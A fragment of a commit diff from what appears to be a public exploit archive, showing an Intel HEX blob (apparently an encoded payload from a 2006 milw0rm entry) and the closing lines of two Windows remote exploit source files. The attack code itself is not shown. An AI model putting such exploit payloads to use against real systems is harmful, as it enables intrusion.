:10001000C414F183EBFCE2F4DD2C50F121C49FB455 :10001000C414F183EBFCE2F4DD2C50F121C49FB455
:100020001D4F68F459C5FB7A6EDC9FAE01C5FFB861 :100020001D4F68F459C5FB7A6EDC9FAE01C5FFB861
:10003000AAF09FF0CFF5D4688D40D4852605DEFC6C :10003000AAF09FF0CFF5D4688D40D4852605DEFC6C
:100040002006FF051A9030F554219FAE05C5FF9795 :100040002006FF051A9030F554219FAE05C5FF9795
:10005000AAC85F7A7ED8151AAAD89FF0CA4D48D58B :10005000AAC85F7A7ED8151AAAD89FF0CA4D48D58B
:1000600025072531454F54C1A4046CFDAA84187A94 :1000600025072531454F54C1A4046CFDAA84187A94
:1000700051D8B97A49CCFFF8AA44A4F121C49F9978 :1000700051D8B97A49CCFFF8AA44A4F121C49F9978
:100080001D9B250741929D09A2046FA149349EF54D :100080001D9B250741929D09A2046FA149349EF54D
:100090007EAC8C0FABCA430EC6A779950FA16C94AA :100090007EAC8C0FABCA430EC6A779950FA16C94AA
:1000A00001EB77D14FA160D154B7718301B379814E :1000A00001EB77D14FA160D154B7718301B379814E
:1000B00011B37AC245E4649052B7639E53A034DE14 :1000B00011B37AC245E4649052B7639E53A034DE14
:1000C000608050D107E2349F44B0349D4EA7759DA7 :1000C000608050D107E2349F44B0349D4EA7759DA7
:1000D00046B67B8451E455954CAD7A9852B0669003 :1000D00046B67B8451E455954CAD7A9852B0669003
:1000E00055AB668201B3798111B37AC245E43BB066 :1000E00055AB668201B3798111B37AC245E43BB066
:0400F000658014F122 :0400F000658014F122
:00000001FF :00000001FF
# milw0rm.com [2006-02-22] # milw0rm.com [2006-02-22]

6
platforms/windows/remote/765.c
View file

@ -225,6 +225,6 @@ main(int argc, char **argv)
fclose(fp); fclose(fp);
return 0; return 0;
} }
// milw0rm.com [2005-01-22] // milw0rm.com [2005-01-22]

6
platforms/windows/remote/771.cpp
View file

@ -235,6 +235,6 @@ main(int argc, char **argv)
fclose(fp); fclose(fp);
return 0; return 0;
} }
// milw0rm.com [2005-01-24] // milw0rm.com [2005-01-24]